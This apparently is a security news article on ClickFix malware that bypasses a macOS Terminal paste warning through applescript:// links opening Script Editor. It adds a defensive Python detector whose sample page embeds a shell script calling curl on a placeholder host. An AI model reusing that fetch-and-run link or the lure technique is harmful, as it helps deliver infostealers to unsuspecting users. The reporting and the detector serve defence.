ClickFix malware authors already bypassing Apple's new Terminal paste warnings

Smartphones Reporter

Apple's Terminal paste warning in macOS Tahoe 26.4 is already being circumvented by ClickFix malware authors who've shifted to using Script Editor instead.

Apple's latest security measure to combat malware on macOS has been circumvented by attackers within weeks of its release. The Terminal paste warning introduced in macOS Tahoe 26.4, designed to disrupt ClickFix attacks, is already being bypassed by malware authors who have shifted their tactics to use Script Editor instead.

The evolution of ClickFix attacks

ClickFix isn't a malware family itself but rather a delivery technique that relies heavily on social engineering. The method typically tricks users into pasting malicious code into Terminal and executing it. Its popularity surged in 2025 following Apple's release of macOS Sequoia, which made it significantly harder for malware to bypass Gatekeeper protections.

Before Sequoia, users could simply right-click to override Gatekeeper and open unsigned or unnotarized software. The new process required navigating to Settings > Privacy and reviewing security information before running such software. This additional friction made fake DMG installers much less effective for malware distribution.

ClickFix emerged as a preferred alternative because it's inexpensive, fast, and bypasses Gatekeeper without requiring a signing certificate. The technique's effectiveness led Apple to implement the Terminal paste warning in Tahoe 26.4 as a countermeasure.

How the new bypass works

According to researchers at Jamf Threat Labs, the latest ClickFix variant completely sidesteps the Terminal paste warning by avoiding Terminal altogether. Instead of prompting users to paste commands into Terminal, the new approach uses a fake Apple-themed webpage that appears to offer legitimate functionality.

One example documented by Jamf shows a spoofed page titled "Reclaim disk space on your Mac" featuring an "Execute" button. When clicked, this button triggers an applescript:// URL scheme in the browser, which prompts the user to open Script Editor with a pre-filled script already loaded.

[Image: Fake Apple webpage with “Execute” button to launch Script Editor. Image via Jamf.]

[Image: Prompt to open Script Editor. Image via Jamf.]

Because the malicious command never passes through Terminal, Apple's new paste warning in macOS Tahoe 26.4 never activates. While Script Editor does present its own "unidentified developer" prompt before saving the script, users who click through this warning allow the script to execute.

Once executed, the script downloads an obfuscated curl command and installs the latest variant of an infostealer or trojan, such as Atomic Stealer, onto the infected Mac.
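For defenders, the applescript:// link described above is something a web proxy, mail gateway or content scanner can look for before the user ever sees the Script Editor prompt. The following is an added example, not code from Jamf or Apple: it finds such links in page source and flags those whose pre-filled script shells out. The host and the `action`/`script` query parameters in the sample URL are assumptions about the URL layout (the article only names the scheme), and the sample page is constructed.

```python
import re
from html import unescape
from urllib.parse import urlsplit, parse_qs

# Matches applescript:// URLs anywhere in markup or inline JavaScript.
APPLESCRIPT_URL = re.compile(r"applescript://[^\s\"'<>]+", re.IGNORECASE)

# Tokens in the decoded script that mean it reaches outside Script Editor.
# "curl" comes from the article; "do shell script" is AppleScript's command
# for running a shell command line.
RISKY_TOKENS = ("do shell script", "curl")

# Constructed sample page (not taken from the Jamf report).
SAMPLE_PAGE = """
<h1>Reclaim disk space on your Mac</h1>
<a href="applescript://com.apple.scripteditor?action=new&amp;script=do%20shell%20script%20%22curl%20https%3A%2F%2Fexample.invalid%2Fx%22">Execute</a>
<a href="https://example.invalid/help">Help</a>
"""


def find_applescript_links(html_text):
    """Return one finding per applescript:// URL found in html_text."""
    findings = []
    for match in APPLESCRIPT_URL.finditer(html_text):
        url = unescape(match.group(0))         # undo &amp; in attribute values
        query = parse_qs(urlsplit(url).query)  # also percent-decodes values
        # Assumption: the pre-filled script travels in the "script" parameter.
        script = " ".join(query.get("script", []))
        lowered = script.lower()
        hits = [token for token in RISKY_TOKENS if token in lowered]
        findings.append({
            "url": url,
            "script": script,
            "tokens": hits,
            # Any applescript:// link on a web page deserves a look;
            # one that runs shell commands is treated as high severity.
            "severity": "high" if hits else "review",
        })
    return findings


if __name__ == "__main__":
    for finding in find_applescript_links(SAMPLE_PAGE):
        print(finding["severity"], finding["tokens"], finding["script"])
```

Because the decoded script is returned with each finding, an analyst can read what Script Editor would have been pre-filled with without opening the link.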

The ongoing security arms race

The rapid emergence of this bypass highlights the continuous back-and-forth between Apple's security measures and malware authors' adaptations. What makes ClickFix particularly challenging is its reliance on social engineering rather than technical exploits, making it difficult for Apple to block without significantly impacting legitimate user workflows.

For users, this underscores the importance of remaining vigilant when encountering unexpected prompts or websites offering system optimization tools. The fact that these attacks can now be initiated with just a couple of clicks makes them especially dangerous for less technically savvy users who might not recognize the social engineering tactics at play.

The security community will be watching closely to see how Apple responds to this latest bypass, as the company has consistently demonstrated its commitment to improving macOS security in the face of evolving threats.
